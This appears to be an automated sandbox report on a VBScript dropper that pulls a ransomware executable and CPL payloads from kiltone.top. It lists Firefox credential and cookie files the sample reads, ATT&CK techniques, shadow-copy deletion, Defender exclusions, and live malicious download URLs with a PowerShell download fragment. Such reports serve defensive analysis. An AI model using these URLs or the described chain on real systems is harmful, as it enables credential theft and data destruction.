Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613291.35dc481e-f598-4332-a743-2bd18ff8343d.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\session-state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\820a30c5-7f21-4cfe-9fd2-c7b1392e747b
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\bc6b0d7e-d6d5-4061-a9ff-337c261da2e4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\a5c31d05-ce4d-4ebb-b063-add0be2a28b1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\335f85c0-9448-4635-9bf1-f868e331c1e6
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607956.bc6b0d7e-d6d5-4061-a9ff-337c261da2e4.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\a793705e-5d28-4452-9fc0-94e9fe2f2378
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\63eea3ec-6088-44da-8f99-8b9ff581461e
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\xulstore.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\954edb0c-b230-497f-8f90-deac373c5582
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\344809ee-0a17-4796-893a-1909a35962e3
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\times.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\times.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613307.820a30c5-7f21-4cfe-9fd2-c7b1392e747b.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\52bfe934-c126-44ae-89db-9e3470a15705
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\0d62319a-fc25-460c-9412-b5110f492c00
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607953.335f85c0-9448-4635-9bf1-f868e331c1e6.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\49695eb7-83b7-45e6-abc4-3adc0ea3ab0f
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607949.f172e4e6-9a48-464e-8f64-96feb97a835e.new-profile.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\targeting.snapshot.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613308.fc281cef-2f97-4da3-a9b9-9686dbf1ffe3.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613314.344809ee-0a17-4796-893a-1909a35962e3.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\96a46cc8-9987-4b2e-b31c-698e7825c524
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\35460303-60f8-44e0-8ebe-643bbf246773
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting
Valid Accounts1
Exploitation for Client Execution
221
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
3
File and Directory Discovery
Remote Services1
Archive Collected Data
3
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts3
PowerShell
1
DLL Side-Loading
1
Extra Window Memory Injection
1
Obfuscated Files or Information
LSASS Memory22
System Information Discovery
Remote Desktop Protocol1
Browser Session Hijacking
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt21
Registry Run Keys / Startup Folder
11
Process Injection
1
DLL Side-Loading
Security Account Manager221
Security Software Discovery
SMB/Windows Admin Shares1
Data from Local System
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
Registry Run Keys / Startup Folder
1
File Deletion
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection
LSA Secrets41
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Masquerading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Remote System Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
Virtualization/Sandbox Evasion
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Rundll32
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575761 Sample: NOTIFICATION_OF_DEPENDANTS.vbs Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 123 kiltone.top 2->123 145 Multi AV Scanner detection for domain / URL 2->145 147 Antivirus detection for URL or domain 2->147 149 Multi AV Scanner detection for dropped file 2->149 151 12 other signatures 2->151 14 wscript.exe 1 2->14         started        17 eryy65ty.exe 2->17         started        19 eryy65ty.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 dnsIp5 183 VBScript performs obfuscated calls to suspicious functions 14->183 185 Wscript starts Powershell (via cmd or directly) 14->185 187 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->187 191 2 other signatures 14->191 24 cmd.exe 1 14->24         started        26 cmd.exe 1 14->26         started        29 cmd.exe 1 14->29         started        31 cmd.exe 1 14->31         started        189 Deletes shadow drive data (may be related to ransomware) 17->189 33 cmd.exe 17->33         started        35 WMIC.exe 17->35         started        37 WMIC.exe 17->37         started        39 cmd.exe 19->39         started        41 2 other processes 19->41 131 127.0.0.1 unknown unknown 21->131 signatures6 process7 signatures8 47 2 other processes 24->47 167 Suspicious powershell command line found 26->167 169 Wscript starts Powershell (via cmd or directly) 26->169 171 Adds a directory exclusion to Windows Defender 26->171 49 2 other processes 26->49 52 2 other processes 29->52 56 2 other processes 31->56 173 Uses ping.exe to sleep 33->173 58 2 other processes 33->58 43 conhost.exe 35->43         started        45 conhost.exe 37->45         started        60 2 other processes 39->60 62 2 other processes 41->62 process9 dnsIp10 64 rundll32.exe 47->64         started        141 Powershell drops PE file 49->141 66 chrome.exe 20 49->66         started        129 kiltone.top 45.125.67.168, 443, 49724, 49733 TELE-ASTeleAsiaLimitedHK Hong Kong 52->129 121 C:\Users\user\AppData\Local\...\fjeljies.cpl, PE32 52->121 dropped 143 Loading BitLocker PowerShell Module 56->143 file11 signatures12 process13 dnsIp14 69 rundll32.exe 64->69         started        125 192.168.2.12, 443, 49708, 49709 unknown unknown 66->125 127 239.255.255.250 unknown Reserved 66->127 72 chrome.exe 66->72         started        process15 dnsIp16 165 Adds a directory exclusion to Windows Defender 69->165 75 cmd.exe 69->75         started        77 cmd.exe 69->77         started        80 cmd.exe 69->80         started        133 www.oldmutual.co.za 72->133 135 www.google.com 142.250.181.68, 443, 49719, 49738 GOOGLEUS United States 72->135 137 d12y248af9ueom.cloudfront.net 108.158.75.80, 443, 49716, 49717 AMAZON-02US United States 72->137 signatures17 process18 signatures19 82 eryy65ty.exe 75->82         started        86 conhost.exe 75->86         started        175 Suspicious powershell command line found 77->175 177 Wscript starts Powershell (via cmd or directly) 77->177 179 Uses ping.exe to sleep 77->179 181 2 other signatures 77->181 88 powershell.exe 77->88         started        90 conhost.exe 77->90         started        92 powershell.exe 80->92         started        94 conhost.exe 80->94         started        process20 file21 111 C:\Users\user\...\UNKRLCVOHV.jpg.EBty (copy), DOS 82->111 dropped 113 C:\Users\user\Downloads\UNKRLCVOHV.jpg, DOS 82->113 dropped 115 954edb0c-b230-497f...73c5582.zasL (copy), COM 82->115 dropped 119 128 other malicious files 82->119 dropped 153 Multi AV Scanner detection for dropped file 82->153 155 Machine Learning detection for dropped file 82->155 157 Deletes shadow drive data (may be related to ransomware) 82->157 163 5 other signatures 82->163 96 cmd.exe 82->96         started        99 WMIC.exe 82->99         started        101 WMIC.exe 82->101         started        159 Loading BitLocker PowerShell Module 88->159 161 Powershell drops PE file 88->161 117 C:\Users\user\AppData\Local\...\eryy65ty.exe, PE32 92->117 dropped signatures22 process23 signatures24 139 Uses ping.exe to sleep 96->139 103 conhost.exe 96->103         started        105 PING.EXE 96->105         started        107 conhost.exe 99->107         started        109 conhost.exe 101->109         started        process25

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
NOTIFICATION_OF_DEPENDANTS.vbs10%VirustotalBrowse
NOTIFICATION_OF_DEPENDANTS.vbs5%ReversingLabsWin32.Dropper.Generic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\eryy65ty.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\eryy65ty.exe83%ReversingLabsWin32.Ransomware.Genasom
C:\Users\user\AppData\Local\Temp\fjeljies.cpl34%ReversingLabsWin32.Trojan.Doina
No Antivirus matches
SourceDetectionScannerLabelLink
d12y248af9ueom.cloudfront.net0%VirustotalBrowse
kiltone.top14%VirustotalBrowse
www.oldmutual.co.za0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp0%Avira URL Cloudsafe
https://www.oldmutual.co.za/favicon.ico0%Avira URL Cloudsafe
https://kiltone.t0%Avira URL Cloudsafe
https://kiltone.top/stelin/Gosjeufon.cpl100%Avira URL Cloudmalware
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4430%Avira URL Cloudsafe
https://www.oldmutual.co.za/v3/assets/blt00%Avira URL Cloudsafe
https://kiltone.top/stelin/rwcla.cpl100%Avira URL Cloudmalware
file:///C:/Users/user/Downloads/downloaded.pdf0%Avira URL Cloudsafe
https://kiltone.top/stelin/rwcla.0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
d12y248af9ueom.cloudfront.net
108.158.75.80
truefalseunknown
www.google.com
142.250.181.68
truefalse
    high
    kiltone.top
    45.125.67.168
    truetrueunknown
    www.oldmutual.co.za
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdftrue
      unknown
      https://www.oldmutual.co.za/favicon.icofalse
      • Avira URL Cloud: safe
      unknown
      https://kiltone.top/stelin/Gosjeufon.cpltrue
      • Avira URL Cloud: malware
      unknown
      https://kiltone.top/stelin/rwcla.cpltrue
      • Avira URL Cloud: malware
      unknown
      file:///C:/Users/user/Downloads/downloaded.pdffalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.avito.ru/3870112724rsegmnoittet-es.sqlite.33.drfalse
        high
        https://digify.com/a/#/access/loginfjeljies.cpl.16.drfalse
          high
          https://www.ctrip.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
            high
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.P9ZDdyXKOWl2places.sqlite.33.drfalse
              high
              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000A.00000003.2602260970.000001FE85A60000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drfalse
                high
                https://www.leboncoin.fr/3870112724rsegmnoittet-es.sqlite.33.drfalse
                  high
                  https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmpcmd.exe, 0000001C.00000002.2909815047.0000000002F20000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://account.bellmedia.c3870112724rsegmnoittet-es.sqlite.33.drfalse
                    high
                    https://g.live.com/odclientsettings/Prod.C:edb.log.10.dr, qmgr.db.10.drfalse
                      high
                      https://weibo.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                        high
                        https://login.microsoftonline.com3870112724rsegmnoittet-es.sqlite.33.drfalse
                          high
                          https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbstrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ifeng.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                            high
                            https://www.zhihu.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                              high
                              http://x1.c.lencr.org/0cert9.db.33.drfalse
                                high
                                http://x1.i.lencr.org/0cert9.db.33.drfalse
                                  high
                                  https://kiltone.twscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.msn.com3870112724rsegmnoittet-es.sqlite.33.drfalse
                                    high
                                    https://www.oldmutual.co.za/v3/assets/blt0wscript.exe, wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2771710158.00000190ECAC0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.reddit.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                      high
                                      https://www.amazon.ca/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                        high
                                        https://www.ebay.co.uk/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                          high
                                          https://github.com/mozilla/webcompat-reporterextensions.json.33.drfalse
                                            high
                                            https://www.amazon.co.uk/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                              high
                                              https://www.ebay.de/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                high
                                                https://screenshots.firefox.com/extensions.json.33.drfalse
                                                  high
                                                  https://www.amazon.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                    high
                                                    https://www.google.com/search?client=firefox-b-d&q=335f85c0-9448-4635-9bf1-f868e331c1e6.33.dr, 820a30c5-7f21-4cfe-9fd2-c7b1392e747b.33.dr, f172e4e6-9a48-464e-8f64-96feb97a835e.33.drfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.33.drfalse
                                                        high
                                                        http://crl.ver)svchost.exe, 0000000A.00000002.3827902230.000001FE85C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:cert9.db.33.drfalse
                                                            high
                                                            https://www.wykop.pl/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                              high
                                                              https://twitter.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                high
                                                                https://digify.com/a/#/access/logincmdfjeljies.cpl.16.drfalse
                                                                  high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.sqlite.33.drfalse
                                                                    high
                                                                    https://www.olx.pl/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                      high
                                                                      https://www.youtube.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                        high
                                                                        https://allegro.pl/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxfavicons.sqlite.33.drfalse
                                                                            high
                                                                            https://MD8.mozilla.org/1/m3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                              high
                                                                              https://www.bbc.co.uk/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                high
                                                                                https://bugzilla.mo3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                  high
                                                                                  https://kiltone.top/stelin/rwcla.wscript.exe, wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2771710158.00000190ECAC0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.amazon.fr/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                    high
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.33.drfalse
                                                                                      high
                                                                                      https://www.google.com/complete/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                        high
                                                                                        https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verifieddata.safe.bin.33.drfalse
                                                                                          high
                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9eprefs.js.33.drfalse
                                                                                            high
                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgprefs.js.33.drfalse
                                                                                              high
                                                                                              https://support.mozilla.orgplaces.sqlite.33.drfalse
                                                                                                high
                                                                                                https://www.google.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/search?client=firefox-b-d&q=&data.safe.bin.33.drfalse
                                                                                                    high
                                                                                                    https://www.iqiyi.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                                      high
                                                                                                      https://www.amazon.de/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                                        high
                                                                                                        https://www.baidu.com/3870112724rsegmnoittet-es.sqlite.33.drfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          45.125.67.168
                                                                                                          kiltone.topHong Kong
                                                                                                          133398TELE-ASTeleAsiaLimitedHKtrue
                                                                                                          239.255.255.250
                                                                                                          unknownReserved
                                                                                                          unknownunknownfalse
                                                                                                          108.158.75.80
                                                                                                          d12y248af9ueom.cloudfront.netUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          142.250.181.68
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          IP
